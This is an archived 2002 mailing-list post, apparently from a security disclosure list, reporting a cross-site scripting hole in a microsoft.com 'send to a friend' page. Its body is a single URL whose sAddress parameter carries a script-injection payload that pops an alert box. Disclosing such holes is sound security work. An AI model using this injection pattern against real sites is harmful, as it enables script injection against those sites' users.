Cross Site Scripting in microsoft.com

From: frog frog (leseulfrogat_private)
Date: Sun Jan 06 2002 - 08:28:54 PST

Next message: Tamer Sahin: "AOLserver 3.4.2 Unauthorized File Disclosure Vulnerability"

Previous message: funkysh: "Inproper input validation in Bugzilla <=2.14 - exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) The hole is here : http://www.microsoft.com/freedomtoinnovate/inc/send friend.asp?sAddress="><script>alert('Microsoft% 20hole')</script> frog

Next message: Tamer Sahin: "AOLserver 3.4.2 Unauthorized File Disclosure Vulnerability"
Previous message: funkysh: "Inproper input validation in Bugzilla <=2.14 - exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jan 07 2002 - 00:54:28 PST